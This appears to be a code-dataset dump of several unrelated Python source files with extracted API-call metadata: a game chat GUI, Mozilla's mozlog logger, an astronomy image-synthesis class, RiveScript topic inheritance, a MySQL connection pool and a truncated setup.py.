whisperCancelTab['frameSize'] = (0, 0.105, 0.0, 0.11)
self.whisperPrefixLabel = DirectLabel(parent = whisperNameTab, relief = None, state = DGG.DISABLED, text = PLocalizer.ProfilePageWhisper + ':', text_scale = (self.myTextScale * self.iPercentage, self.myTextScale, self.myTextScale), text_align = TextNode.ALeft, text_fg = PiratesGuiGlobals.TextFG1, text_shadow = PiratesGuiGlobals.TextShadow, text_pos = (0.033000000000000002, 0.040000000000000001, 0), text_font = PiratesGlobals.getInterfaceFont())
DirectLabel(parent = whisperCancelTab, relief = None, state = DGG.DISABLED, text = 'X', text_scale = (self.myTextScale * 1.1799999999999999, self.myTextScale * 1.1799999999999999, self.myTextScale * 1.1799999999999999), text_align = TextNode.ACenter, text_fg = PiratesGuiGlobals.TextFG1, text_shadow = PiratesGuiGlobals.TextShadow, text_pos = (0.052999999999999999, 0.042999999999999997, 0), text_font = PiratesGlobals.getInterfaceFont())
self.whisperTabs.stash()
self.request('Hidden')
def cleanupGui(self):
self.whisperPrefixLabel = None
self.chatEntryBackground = None
self.backTabParent = None
self.frontTabParent = None
self.speedButton = None
self.emoteButton = None
self.startChatButton = None
if self.chatTabs:
self.chatTabs.destroy()
self.chatTabs = None
if self.whisperTabs:
self.whisperTabs.destroy()
self.whisperTabs = None
def whisperCanceled(self):
self.chatMgr.whisperCanceled()
def refreshTabStates(self):
if self.getCurrentOrNextState() not in ('Off', 'Hidden', 'Whisper'):
if not self.chatMgr.crewChatAllowed:
self.chatTabs.getTab('Crew').stash()
else:
self.chatTabs.getTab('Crew').unstash()
if not self.chatMgr.guildChatAllowed:
self.chatTabs.getTab('Guild').stash()
else:
self.chatTabs.getTab('Guild').unstash()
if not self.chatMgr.shipPVPChatAllowed:
self.chatTabs.getTab('ShipPVP').stash()
else:
self.chatTabs.getTab('ShipPVP').unstash()
def stopSlideIval(self):
if self.slideIval and self.slideIval.isPlaying():
self.slideIval.pause()
def enterHidden(self):
self.stopSlideIval()
self.slideIval = Sequence(Func(self.chatEntryVisNode.setAlphaScale, 0), Func(self.chatEntryVisNode.hide), self.chatEntryBackground.posInterval(0.25, Point3(-0.90000000000000002, 0, 0), blendType = 'easeIn'), Func(self.startChatButton.show), Func(self.chatEntryBackground.hide))
self.slideIval.start()
def exitHidden(self):
self.stopSlideIval()
self.slideIval = Sequence(Func(self.chatEntryVisNode.show), Func(self.chatEntryBackground.show), Func(self.startChatButton.hide), self.chatEntryBackground.posInterval(0.25, Point3(0, 0, 0), blendType = 'easeOut'), Func(self.chatEntryVisNode.setAlphaScale, 1))
self.slideIval.start()
def enterAll(self):
self.chatTabs.unstash()
self.whisperTabs.stash()
self.chatTabs.selectTab('All')
self.refreshTabStates()
def exitAll(self):
pass
def enterCrew(self):
self.chatTabs.unstash()
self.whisperTabs.stash()
self.chatTabs.selectTab('Crew')
self.refreshTabStates()
def exitCrew(self):
pass
def enterGuild(self):
self.chatTabs.unstash()
self.whisperTabs.stash()
self.chatTabs.selectTab('Guild')
self.refreshTabStates()
def enterShipPVP(self):
self.chatTabs.unstash()
self.whisperTabs.stash()
self.chatTabs.selectTab('ShipPVP')
self.refreshTabStates()
def exitShipPVP(self):
pass
def exitGuild(self):
pass
def enterWhisper(self, avatarName = 'John Sharkbait', whisperId = 0):
self.whisperName = avatarName
self.whisperId = whisperId
self.chatTabs.stash()
self.whisperTabs.unstash()
if self.whisperNameLabel:
self.whisperNameLabel.destroy()
self.whisperNameLabel = DirectLabel(parent = self.whisperTabs.getTab('Name'), relief = None, state = DGG.DISABLED, text = avatarName, text_scale = (self.myTextScale * self.iPercentage, self.myTextScale, self.myTextScale), text_align = TextNode.ALeft, text_fg = PiratesGuiGlobals.TextFG2, text_shadow = PiratesGuiGlobals.TextShadow, text_pos = (0.20999999999999999 * self.iPercentage, 0.040000000000000001, 0), text_font = PiratesGlobals.getInterfaceFont())
def exitWhisper(self):
self.whisperName = ''
self.whisperId = 0
if self.whisperNameLabel and 0:
self.whisperNameLabel.destroy()
self.whisperNameLabel = None
| [((803, 846), 'pirates.piratesgui.TabBar.TopTab.__init__', 'TopTab.__init__', (['self', 'tabBar', 'name'], {}), '(self, tabBar, name, **None)\n', (818, 846), False, 'from pirates.piratesgui.TabBar import TopTab, TabBar\n'), ((1500, 1520), 'pirates.piratesgui.TabBar.TopTab.destroy', 'TopTab.destroy', (['self'], {}), '(self)\n', (1514, 1520), False, 'from pirates.piratesgui.TabBar import TopTab, TabBar\n'), ((2557, 2575), 'pirates.piratesgui.TabBar.TabBar.stash', 'TabBar.stash', (['self'], {}), '(self)\n', (2569, 2575), False, 'from pirates.piratesgui.TabBar import TopTab, TabBar\n'), ((3031, 3074), 'pirates.piratesgui.TabBar.TopTab.__init__', 'TopTab.__init__', (['self', 'tabBar', 'name'], {}), '(self, tabBar, name, **None)\n', (3046, 3074), False, 'from pirates.piratesgui.TabBar import TopTab, TabBar\n'), ((4503, 4532), 'direct.fsm.FSM.FSM.__init__', 'FSM.__init__', (['self', '"""ChatBar"""'], {}), "(self, 'ChatBar')\n", (4515, 4532), False, 'from direct.fsm.FSM import FSM\n'), ((1381, 1414), 'pirates.piratesbase.PiratesGlobals.getInterfaceFont', 'PiratesGlobals.getInterfaceFont', ([], {}), '()\n', (1412, 1414), False, 'from pirates.piratesbase import PiratesGlobals\n'), ((11416, 11449), 'pirates.piratesbase.PiratesGlobals.getInterfaceFont', 'PiratesGlobals.getInterfaceFont', ([], {}), '()\n', (11447, 11449), False, 'from pirates.piratesbase import PiratesGlobals\n'), ((11863, 11896), 'pirates.piratesbase.PiratesGlobals.getInterfaceFont', 'PiratesGlobals.getInterfaceFont', ([], {}), '()\n', (11894, 11896), False, 'from pirates.piratesbase import PiratesGlobals\n'), ((15660, 15693), 'pirates.piratesbase.PiratesGlobals.getInterfaceFont', 'PiratesGlobals.getInterfaceFont', ([], {}), '()\n', (15691, 15693), False, 'from pirates.piratesbase import PiratesGlobals\n')] |
lucashmorais/x-Bench | mozmill-env/python/Lib/site-packages/mozlog/logger.py | 2080b8753dd6e45c2212666bcdb05327752a94e9 | # This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this file,
# You can obtain one at http://mozilla.org/MPL/2.0/.
from logging import getLogger as getSysLogger
from logging import *
# Some of the build slave environments don't see the following when doing
# 'from logging import *'
# see https://bugzilla.mozilla.org/show_bug.cgi?id=700415#c35
from logging import getLoggerClass, addLevelName, setLoggerClass, shutdown, debug, info, basicConfig
import json
_default_level = INFO
_LoggerClass = getLoggerClass()
# Define mozlog specific log levels
START = _default_level + 1
END = _default_level + 2
PASS = _default_level + 3
KNOWN_FAIL = _default_level + 4
FAIL = _default_level + 5
CRASH = _default_level + 6
# Define associated text of log levels
addLevelName(START, 'TEST-START')
addLevelName(END, 'TEST-END')
addLevelName(PASS, 'TEST-PASS')
addLevelName(KNOWN_FAIL, 'TEST-KNOWN-FAIL')
addLevelName(FAIL, 'TEST-UNEXPECTED-FAIL')
addLevelName(CRASH, 'PROCESS-CRASH')
class MozLogger(_LoggerClass):
"""
MozLogger class which adds some convenience log levels
related to automated testing in Mozilla and ability to
output structured log messages.
"""
def testStart(self, message, *args, **kwargs):
"""Logs a test start message"""
self.log(START, message, *args, **kwargs)
def testEnd(self, message, *args, **kwargs):
"""Logs a test end message"""
self.log(END, message, *args, **kwargs)
def testPass(self, message, *args, **kwargs):
"""Logs a test pass message"""
self.log(PASS, message, *args, **kwargs)
def testFail(self, message, *args, **kwargs):
"""Logs a test fail message"""
self.log(FAIL, message, *args, **kwargs)
def testKnownFail(self, message, *args, **kwargs):
"""Logs a test known fail message"""
self.log(KNOWN_FAIL, message, *args, **kwargs)
def processCrash(self, message, *args, **kwargs):
"""Logs a process crash message"""
self.log(CRASH, message, *args, **kwargs)
def log_structured(self, action, params=None):
"""Logs a structured message object."""
if params is None:
params = {}
level = params.get('_level', _default_level)
if isinstance(level, int):
params['_level'] = getLevelName(level)
else:
params['_level'] = level
level = getLevelName(level.upper())
# If the logger is fed a level number unknown to the logging
# module, getLevelName will return a string. Unfortunately,
# the logging module will raise a type error elsewhere if
# the level is not an integer.
if not isinstance(level, int):
level = _default_level
params['action'] = action
# The can message be None. This is expected, and shouldn't cause
# unstructured formatters to fail.
message = params.get('_message')
self.log(level, message, extra={'params': params})
class JSONFormatter(Formatter):
"""Log formatter for emitting structured JSON entries."""
def format(self, record):
# Default values determined by logger metadata
output = {
'_time': int(round(record.created * 1000, 0)),
'_namespace': record.name,
'_level': getLevelName(record.levelno),
}
# If this message was created by a call to log_structured,
# anything specified by the caller's params should act as
# an override.
output.update(getattr(record, 'params', {}))
if record.msg and output.get('_message') is None:
# For compatibility with callers using the printf like
# API exposed by python logging, call the default formatter.
output['_message'] = Formatter.format(self, record)
return json.dumps(output, indent=output.get('indent'))
class MozFormatter(Formatter):
"""
MozFormatter class used to standardize formatting
If a different format is desired, this can be explicitly
overriden with the log handler's setFormatter() method
"""
level_length = 0
max_level_length = len('TEST-START')
def __init__(self, include_timestamp=False):
"""
Formatter.__init__ has fmt and datefmt parameters that won't have
any affect on a MozFormatter instance.
:param include_timestamp: if True, include formatted time at the
beginning of the message
"""
self.include_timestamp = include_timestamp
Formatter.__init__(self)
def format(self, record):
# Handles padding so record levels align nicely
if len(record.levelname) > self.level_length:
pad = 0
if len(record.levelname) <= self.max_level_length:
self.level_length = len(record.levelname)
else:
pad = self.level_length - len(record.levelname) + 1
sep = '|'.rjust(pad)
fmt = '%(name)s %(levelname)s ' + sep + ' %(message)s'
if self.include_timestamp:
fmt = '%(asctime)s ' + fmt
# this protected member is used to define the format
# used by the base Formatter's method
self._fmt = fmt
return Formatter.format(self, record)
def getLogger(name, handler=None):
"""
Returns the logger with the specified name.
If the logger doesn't exist, it is created.
If handler is specified, adds it to the logger. Otherwise a default handler
that logs to standard output will be used.
:param name: The name of the logger to retrieve
:param handler: A handler to add to the logger. If the logger already exists,
and a handler is specified, an exception will be raised. To
add a handler to an existing logger, call that logger's
addHandler method.
"""
setLoggerClass(MozLogger)
if name in Logger.manager.loggerDict:
if handler:
raise ValueError('The handler parameter requires ' + \
'that a logger by this name does ' + \
'not already exist')
return Logger.manager.loggerDict[name]
logger = getSysLogger(name)
logger.setLevel(_default_level)
if handler is None:
handler = StreamHandler()
handler.setFormatter(MozFormatter())
logger.addHandler(handler)
logger.propagate = False
return logger
| [((581, 597), 'logging.getLoggerClass', 'getLoggerClass', ([], {}), '()\n', (595, 597), False, 'from logging import getLoggerClass, addLevelName, setLoggerClass, shutdown, debug, info, basicConfig\n'), ((866, 899), 'logging.addLevelName', 'addLevelName', (['START', '"""TEST-START"""'], {}), "(START, 'TEST-START')\n", (878, 899), False, 'from logging import getLoggerClass, addLevelName, setLoggerClass, shutdown, debug, info, basicConfig\n'), ((900, 929), 'logging.addLevelName', 'addLevelName', (['END', '"""TEST-END"""'], {}), "(END, 'TEST-END')\n", (912, 929), False, 'from logging import getLoggerClass, addLevelName, setLoggerClass, shutdown, debug, info, basicConfig\n'), ((930, 961), 'logging.addLevelName', 'addLevelName', (['PASS', '"""TEST-PASS"""'], {}), "(PASS, 'TEST-PASS')\n", (942, 961), False, 'from logging import getLoggerClass, addLevelName, setLoggerClass, shutdown, debug, info, basicConfig\n'), ((962, 1005), 'logging.addLevelName', 'addLevelName', (['KNOWN_FAIL', '"""TEST-KNOWN-FAIL"""'], {}), "(KNOWN_FAIL, 'TEST-KNOWN-FAIL')\n", (974, 1005), False, 'from logging import getLoggerClass, addLevelName, setLoggerClass, shutdown, debug, info, basicConfig\n'), ((1006, 1048), 'logging.addLevelName', 'addLevelName', (['FAIL', '"""TEST-UNEXPECTED-FAIL"""'], {}), "(FAIL, 'TEST-UNEXPECTED-FAIL')\n", (1018, 1048), False, 'from logging import getLoggerClass, addLevelName, setLoggerClass, shutdown, debug, info, basicConfig\n'), ((1049, 1085), 'logging.addLevelName', 'addLevelName', (['CRASH', '"""PROCESS-CRASH"""'], {}), "(CRASH, 'PROCESS-CRASH')\n", (1061, 1085), False, 'from logging import getLoggerClass, addLevelName, setLoggerClass, shutdown, debug, info, basicConfig\n'), ((6036, 6061), 'logging.setLoggerClass', 'setLoggerClass', (['MozLogger'], {}), '(MozLogger)\n', (6050, 6061), False, 'from logging import getLoggerClass, addLevelName, setLoggerClass, shutdown, debug, info, basicConfig\n'), ((6371, 6389), 'logging.getLogger', 'getSysLogger', (['name'], {}), '(name)\n', (6383, 6389), True, 'from logging import getLogger as getSysLogger\n')] |
wdobbels/CAAPR | CAAPR/CAAPR_AstroMagic/PTS/pts/core/misc/images.py | 50d0b32642a61af614c22f1c6dc3c4a00a1e71a3 | #!/usr/bin/env python
# -*- coding: utf8 -*-
# *****************************************************************
# ** PTS -- Python Toolkit for working with SKIRT **
# ** © Astronomical Observatory, Ghent University **
# *****************************************************************
## \package pts.core.misc.fluxes Contains the ObservedImageMaker class.
# -----------------------------------------------------------------
# Ensure Python 3 compatibility
from __future__ import absolute_import, division, print_function
# Import astronomical modules
from astropy.units import Unit
from astropy import constants
# Import the relevant PTS classes and modules
from ..tools.logging import log
from ..tools import filesystem as fs
from ..basics.filter import Filter
from ...magic.core.image import Image
from ...magic.core.frame import Frame
from ...magic.basics.coordinatesystem import CoordinateSystem
from ..tools.special import remote_filter_convolution, remote_convolution_frame
# -----------------------------------------------------------------
# The speed of light
speed_of_light = constants.c
# -----------------------------------------------------------------
class ObservedImageMaker(object):
"""
This class ...
"""
def __init__(self):
"""
The constructor ...
:return:
"""
# Call the constructor of the base class
super(ObservedImageMaker, self).__init__()
# -- Attributes --
# The simulation prefix
self.simulation_prefix = None
# The paths to the 'total' FITS files produced by SKIRT
self.fits_paths = None
# The wavelengths of the simulation
self.wavelengths = None
# Filter names
self.filter_names = ["FUV", "NUV", "u", "g", "r", "i", "z", "H", "J", "Ks", "I1", "I2", "I3", "I4", "W1", "W2",
"W3", "W4", "Pacs 70", "Pacs 100", "Pacs 160", "SPIRE 250", "SPIRE 350", "SPIRE 500"]
# The instrument names
self.instrument_names = None
# The filters for which the images should be created
self.filters = dict()
# The dictionary containing the images for various SKIRT output datacubes
self.images = dict()
# The reference WCS
self.wcs = None
# -----------------------------------------------------------------
def run(self, simulation, output_path=None, filter_names=None, instrument_names=None, wcs_path=None, kernel_paths=None, unit=None, host_id=None):
"""
This function ...
:param simulation:
:param output_path:
:param filter_names:
:param instrument_names:
:param wcs_path:
:param kernel_paths:
:param unit:
:param host_id:
:return:
"""
# Obtain the paths to the 'total' FITS files created by the simulation
self.fits_paths = simulation.totalfitspaths()
# Get the list of wavelengths for the simulation
self.wavelengths = simulation.wavelengths()
# Get the simulation prefix
self.simulation_prefix = simulation.prefix()
# Set the filter names
if filter_names is not None: self.filter_names = filter_names
# Set the instrument names
self.instrument_names = instrument_names
# Create the filters
self.create_filters()
# Make the observed images
self.make_images(host_id)
# Set the WCS of the created images
if wcs_path is not None: self.set_wcs(wcs_path)
# Convolve the image with a given convolution kernel
if kernel_paths is not None:
# Check whether the WCS for the image is defined. If not, show a warning and skip the convolution
if wcs_path is None: log.warning("WCS of the image is not defined, so convolution cannot be performed (the pixelscale is undefined)")
else: self.convolve(kernel_paths, host_id)
# Convert the units (WCS has to be loaded!)
if unit is not None: self.convert_units(unit)
# Write the results
if output_path is not None: self.write(output_path)
# -----------------------------------------------------------------
def create_filters(self):
"""
This function ...
:return:
"""
# Inform the user
log.info("Constructing the filter objects ...")
# Loop over the different filter names
for filter_name in self.filter_names:
# Debugging
log.debug("Constructing the " + filter_name + " filter ...")
# Create the filter
fltr = Filter.from_string(filter_name)
# Add the filter to the list
self.filters[filter_name] = fltr
# -----------------------------------------------------------------
def make_images(self, host_id=None):
"""
This function ...
:param host_id:
:return:
"""
# Inform the user
log.info("Making the observed images (this may take a while) ...")
# Loop over the different simulated images
for path in self.fits_paths:
# Get the name of the instrument
instr_name = instrument_name(path, self.simulation_prefix)
# If a list of instruments is defined an this instrument is not in this list, skip it
if self.instrument_names is not None and instr_name not in self.instrument_names: continue
# Get the name of the datacube (as given by SKIRT)
datacube_name = fs.strip_extension(fs.name(path))
# Debugging
log.debug("Making the observed images for " + datacube_name + ".fits ...")
# Create a dictionary to contain the observed images for this FITS file
images = dict()
# The filter convolution is performed remotely
if host_id is not None:
# Upload the datacube, wavelength grid and filter properties, perform the convolution on the remote and get the resulting image frames back (as a dictionary where the keys are the filter names)
frames = remote_filter_convolution(host_id, path, self.wavelengths, self.filters)
# Add the resulting image frames to the dictionary
for filter_name in frames:
# Add the observed image to the dictionary
images[filter_name] = frames[filter_name]
# The calculation is performed locally
else:
# Load the simulated image
datacube = Image.from_file(path, always_call_first_primary=False)
# Convert the frames from neutral surface brightness to wavelength surface brightness
for l in range(len(self.wavelengths)):
# Get the wavelength
wavelength = self.wavelengths[l]
# Determine the name of the frame in the datacube
frame_name = "frame" + str(l)
# Divide this frame by the wavelength in micron
datacube.frames[frame_name] /= wavelength
# Set the new unit
datacube.frames[frame_name].unit = "W / (m2 * arcsec2 * micron)"
# Convert the datacube to a numpy array where wavelength is the third dimension
fluxdensities = datacube.asarray()
# Loop over the different filters
for filter_name in self.filters:
fltr = self.filters[filter_name]
# Debugging
log.debug("Making the observed image for the " + str(fltr) + " filter ...")
# Calculate the observed image frame
data = fltr.convolve(self.wavelengths, fluxdensities)
frame = Frame(data)
# Set the unit of the frame
frame.unit = "W/(m2 * arcsec2 * micron)"
# Add the observed image to the dictionary
images[filter_name] = frame
# Add the dictionary of images of the current datacube to the complete images dictionary (with the datacube name as a key)
self.images[datacube_name] = images
# -----------------------------------------------------------------
def set_wcs(self, wcs_path):
"""
This function ...
:param wcs_path:
:return:
"""
# TODO: allow multiple paths (in a dictionary) for the different datacubes (so that for certain instruments the WCS should not be set on the simulated images)
# Inform the user
log.info("Setting the WCS of the simulated images ...")
# Debugging
log.debug("Loading the coordinate system from '" + wcs_path + "' ...")
# Load the WCS
self.wcs = CoordinateSystem.from_file(wcs_path)
# Loop over the different images and set the WCS
for datacube_name in self.images:
for filter_name in self.images[datacube_name]:
# Debugging
log.debug("Setting the coordinate system of the " + filter_name + " image of the '" + datacube_name + "' instrument ...")
# Set the coordinate system for this frame
self.images[datacube_name][filter_name].wcs = self.wcs
# -----------------------------------------------------------------
def convolve(self, kernel_paths, host_id=None):
"""
This function ...
:param kernel_paths:
:param host_id:
:return:
"""
# Inform the user
log.info("Convolving the images ...")
# If the convolutions must be performed remotely
if host_id is not None:
# Loop over the images
for datacube_name in self.images:
for filter_name in self.images[datacube_name]:
# Check if the name of the image filter is a key in the 'kernel_paths' dictionary. If not, don't convolve.
if filter_name not in kernel_paths or kernel_paths[filter_name] is None: continue
# Determine the kernel path for this image
kernel_path = kernel_paths[filter_name]
# Perform the remote convolution
self.images[datacube_name][filter_name] = remote_convolution_frame(self.images[datacube_name][filter_name], kernel_path, host_id)
# The convolution is performed locally
else:
# Loop over the images
for datacube_name in self.images:
for filter_name in self.images[datacube_name]:
# Check if the name of the image filter is a key in the 'kernel_paths' dictionary. If not, don't convolve.
if filter_name not in kernel_paths or kernel_paths[filter_name] is None: continue
# Load the kernel
kernel = Frame.from_file(kernel_paths[filter_name])
# Debugging
log.debug("Convolving the '" + filter_name + "' image of the '" + datacube_name + "' instrument ...")
# Convolve this image frame
self.images[datacube_name][filter_name].convolve(kernel)
# -----------------------------------------------------------------
def convert_units(self, unit):
"""
This function ...
:param self:
:param unit:
:return:
"""
# TODO: right now, this is just an implementation of the conversion from W / (m2 * arcsec2 * micron) to MJy/sr
# 1 Jy = 1e-26 * W / (m2 * Hz)
# Inform the user
log.info("Converting the units of the images to " + str(unit) + " ...")
# Get the pixelscale
#pixelscale = self.wcs.average_pixelscale.to("arcsec/pix").value # in arcsec**2 / pixel
# Loop over the images
for datacube_name in self.images:
for filter_name in self.images[datacube_name]:
# Debugging
log.debug("Converting the unit of the " + filter_name + " image of the '" + datacube_name + "' instrument ...")
# Get the pivot wavelength of the filter
fltr = self.filters[filter_name]
pivot = fltr.pivotwavelength() * Unit("micron")
# Determine the conversion factor
conversion_factor = 1.0
# From surface brightness to flux density (no)
#conversion_factor *=
# From W / (m2 * arcsec2 * micron) to W / (m2 * arcsec2 * Hz)
conversion_factor *= (pivot ** 2 / speed_of_light).to("micron/Hz").value
# From W / (m2 * arcsec2 * Hz) to MJy / sr
#conversion_factor *= (Unit("W/(m2 * arcsec2 * Hz)") / Unit("MJy/sr")).to("")
conversion_factor *= 1e26 * 1e-6 * (Unit("sr") / Unit("arcsec2")).to("")
# Convert
self.images[datacube_name][filter_name] *= conversion_factor
self.images[datacube_name][filter_name].unit = "MJy/sr"
# -----------------------------------------------------------------
def write(self, output_path):
"""
This function ...
:param output_path:
:return:
"""
# Inform the user
log.info("Writing the images ...")
# Loop over the different images (self.images is a nested dictionary of dictionaries)
for datacube_name in self.images:
for filter_name in self.images[datacube_name]:
# Determine the path to the output FITS file
path = fs.join(output_path, datacube_name + "__" + filter_name + ".fits")
# Save the image
self.images[datacube_name][filter_name].save(path)
# -----------------------------------------------------------------
def instrument_name(datacube_path, prefix):
"""
This function ...
:param datacube_path:
:param prefix:
:return:
"""
return fs.name(datacube_path).split("_total.fits")[0].split(prefix + "_")[1]
# -----------------------------------------------------------------
| [((12455, 12469), 'astropy.units.Unit', 'Unit', (['"""micron"""'], {}), "('micron')\n", (12459, 12469), False, 'from astropy.units import Unit\n'), ((13037, 13047), 'astropy.units.Unit', 'Unit', (['"""sr"""'], {}), "('sr')\n", (13041, 13047), False, 'from astropy.units import Unit\n'), ((13050, 13065), 'astropy.units.Unit', 'Unit', (['"""arcsec2"""'], {}), "('arcsec2')\n", (13054, 13065), False, 'from astropy.units import Unit\n')] |
Hazemcodes/GimmyBot | venv/Lib/site-packages/rivescript/inheritance.py | f24cb90e0d3c045100f59def1d5e14bef367cba7 | # RiveScript-Python
#
# This code is released under the MIT License.
# See the "LICENSE" file for more information.
#
# https://www.rivescript.com/
def get_topic_triggers(rs, topic, thats, depth=0, inheritance=0, inherited=False):
"""Recursively scan a topic and return a list of all triggers.
Arguments:
rs (RiveScript): A reference to the parent RiveScript instance.
topic (str): The original topic name.
thats (bool): Are we getting triggers for 'previous' replies?
depth (int): Recursion step counter.
inheritance (int): The inheritance level counter, for topics that
inherit other topics.
inherited (bool): Whether the current topic is inherited by others.
Returns:
[]str: List of all triggers found.
"""
# Break if we're in too deep.
if depth > rs._depth:
rs._warn("Deep recursion while scanning topic inheritance")
# Keep in mind here that there is a difference between 'includes' and
# 'inherits' -- topics that inherit other topics are able to OVERRIDE
# triggers that appear in the inherited topic. This means that if the top
# topic has a trigger of simply '*', then NO triggers are capable of
# matching in ANY inherited topic, because even though * has the lowest
# priority, it has an automatic priority over all inherited topics.
#
# The getTopicTriggers method takes this into account. All topics that
# inherit other topics will have their triggers prefixed with a fictional
# {inherits} tag, which would start at {inherits=0} and increment if this
# topic has other inheriting topics. So we can use this tag to make sure
# topics that inherit things will have their triggers always be on top of
# the stack, from inherits=0 to inherits=n.
# Important info about the depth vs inheritance params to this function:
# depth increments by 1 each time this function recursively calls itrs.
# inheritance increments by 1 only when this topic inherits another
# topic.
#
# This way, '> topic alpha includes beta inherits gamma' will have this
# effect:
# alpha and beta's triggers are combined together into one matching
# pool, and then those triggers have higher matching priority than
# gamma's.
#
# The inherited option is True if this is a recursive call, from a topic
# that inherits other topics. This forces the {inherits} tag to be added
# to the triggers. This only applies when the top topic 'includes'
# another topic.
rs._say("\tCollecting trigger list for topic " + topic + "(depth="
+ str(depth) + "; inheritance=" + str(inheritance) + "; "
+ "inherited=" + str(inherited) + ")")
# topic: the name of the topic
# depth: starts at 0 and ++'s with each recursion
# Topic doesn't exist?
if not topic in rs._topics:
rs._warn("Inherited or included topic {} doesn't exist or has no triggers".format(
topic
))
return []
# Collect an array of triggers to return.
triggers = []
# Get those that exist in this topic directly.
inThisTopic = []
if not thats:
# The non-that structure is {topic}->[array of triggers]
if topic in rs._topics:
for trigger in rs._topics[topic]:
inThisTopic.append([ trigger["trigger"], trigger ])
else:
# The 'that' structure is: {topic}->{cur trig}->{prev trig}->{trig info}
if topic in rs._thats.keys():
for curtrig in rs._thats[topic].keys():
for previous, pointer in rs._thats[topic][curtrig].items():
inThisTopic.append([ pointer["trigger"], pointer ])
# Does this topic include others?
if topic in rs._includes:
# Check every included topic.
for includes in rs._includes[topic]:
rs._say("\t\tTopic " + topic + " includes " + includes)
triggers.extend(get_topic_triggers(rs, includes, thats, (depth + 1), inheritance, True))
# Does this topic inherit others?
if topic in rs._lineage:
# Check every inherited topic.
for inherits in rs._lineage[topic]:
rs._say("\t\tTopic " + topic + " inherits " + inherits)
triggers.extend(get_topic_triggers(rs, inherits, thats, (depth + 1), (inheritance + 1), False))
# Collect the triggers for *this* topic. If this topic inherits any
# other topics, it means that this topic's triggers have higher
# priority than those in any inherited topics. Enforce this with an
# {inherits} tag.
if topic in rs._lineage or inherited:
for trigger in inThisTopic:
rs._say("\t\tPrefixing trigger with {inherits=" + str(inheritance) + "}" + trigger[0])
triggers.append(["{inherits=" + str(inheritance) + "}" + trigger[0], trigger[1]])
else:
triggers.extend(inThisTopic)
return triggers
def get_topic_tree(rs, topic, depth=0):
"""Given one topic, get the list of all included/inherited topics.
:param str topic: The topic to start the search at.
:param int depth: The recursion depth counter.
:return []str: Array of topics.
"""
# Break if we're in too deep.
if depth > rs._depth:
rs._warn("Deep recursion while scanning topic trees!")
return []
# Collect an array of all topics.
topics = [topic]
# Does this topic include others?
if topic in rs._includes:
# Try each of these.
for includes in sorted(rs._includes[topic]):
topics.extend(get_topic_tree(rs, includes, depth + 1))
# Does this topic inherit others?
if topic in rs._lineage:
# Try each of these.
for inherits in sorted(rs._lineage[topic]):
topics.extend(get_topic_tree(rs, inherits, depth + 1))
return topics
| [] |
mattmillr/utaka | src/dataAccess/Connection.py | 6622e9057c323b0aed1113f8723404d264a7c82e | #Copyright 2009 Humanitarian International Services Group
#
#Licensed under the Apache License, Version 2.0 (the "License");
#you may not use this file except in compliance with the License.
#You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
#Unless required by applicable law or agreed to in writing, software
#distributed under the License is distributed on an "AS IS" BASIS,
#WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
#See the License for the specific language governing permissions and
#limitations under the License.
'''
Created Aug 4, 2009
connection pool abstraction over previous Connection.py which is now SingleConnection.py
sets up module scope connection pool, currently with no size limit
pool for both connections with dictionary cursors and regular cursors
reconnects to db every x hours depending on config file
@author: Andrew
'''
from utaka.src.dataAccess.SingleConnection import Connection as SingleConnection
import utaka.src.Config as Config
import MySQLdb
import datetime
dcp = [SingleConnection(True)]
rcp = [SingleConnection(False)]
dbTimer = datetime.datetime.today()
dbTimeout = datetime.timedelta(hours = int(Config.get('database', 'connection_timeout_in_hours')))
class Connection:
def __init__(self, useDictCursor = False):
if len(dcp) > 0:
if useDictCursor:
self.innerConn = dcp.pop()
else:
self.innerConn = rcp.pop()
now = datetime.datetime.today()
if (now - dbTimeout) > self.innerConn.connectTime:
self.innerConn.close()
self.innerConn = SingleConnection(useDictCursor)
else:
self.innerConn = SingleConnection(useDictCursor)
def usingDictCursor(self):
return self.innerConn.usingDictCursor()
def executeStatement(self, statement, placeholder):
return self.innerConn.executeStatement(statement, placeholder)
def getRowCount(self):
return self.innerConn.rowcount()
def commit(self):
self.innerConn.commit()
def rollback(self):
self.innerConn.rollback()
def close(self):
self.commit()
self.__close_()
def cancelAndClose(self):
self.rollback()
self.__close_()
def __close_(self):
utakaLog = open('/var/www/html/utaka/utakaLog', 'a')
try:
if self.usingDictCursor():
utakaLog.write('Dictionary Database Connection Returned to Pool\r\n')
else:
utakaLog.write('Regular Database Connection Returned to Pool\r\n')
finally:
utakaLog.close()
if self.usingDictCursor():
dcp.append(self.innerConn)
else:
rcp.append(self.innerConn)
self.innerConn = None
| [((1144, 1169), 'datetime.datetime.today', 'datetime.datetime.today', ([], {}), '()\n', (1167, 1169), False, 'import datetime\n'), ((1078, 1100), 'utaka.src.dataAccess.SingleConnection.Connection', 'SingleConnection', (['(True)'], {}), '(True)\n', (1094, 1100), True, 'from utaka.src.dataAccess.SingleConnection import Connection as SingleConnection\n'), ((1109, 1132), 'utaka.src.dataAccess.SingleConnection.Connection', 'SingleConnection', (['(False)'], {}), '(False)\n', (1125, 1132), True, 'from utaka.src.dataAccess.SingleConnection import Connection as SingleConnection\n'), ((1213, 1266), 'utaka.src.Config.get', 'Config.get', (['"""database"""', '"""connection_timeout_in_hours"""'], {}), "('database', 'connection_timeout_in_hours')\n", (1223, 1266), True, 'import utaka.src.Config as Config\n'), ((1452, 1477), 'datetime.datetime.today', 'datetime.datetime.today', ([], {}), '()\n', (1475, 1477), False, 'import datetime\n'), ((1640, 1671), 'utaka.src.dataAccess.SingleConnection.Connection', 'SingleConnection', (['useDictCursor'], {}), '(useDictCursor)\n', (1656, 1671), True, 'from utaka.src.dataAccess.SingleConnection import Connection as SingleConnection\n'), ((1580, 1611), 'utaka.src.dataAccess.SingleConnection.Connection', 'SingleConnection', (['useDictCursor'], {}), '(useDictCursor)\n', (1596, 1611), True, 'from utaka.src.dataAccess.SingleConnection import Connection as SingleConnection\n')] |
DKorytkin/pylint-pytest | setup.py | 097b7767e5f33ad512d421bea9ebb74a251f47bd | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from os import path
from setuptools import setup, find_packages
here = path.abspath(path.dirname(__file__))
with open(path.join(here, 'README.md')) as fin:
long_description = fin.read()
setup(
name='pylint-pytest',
version='1.0.3',
author='Reverb Chu',
author_email='[email protected]',
maintainer='Reverb Chu',
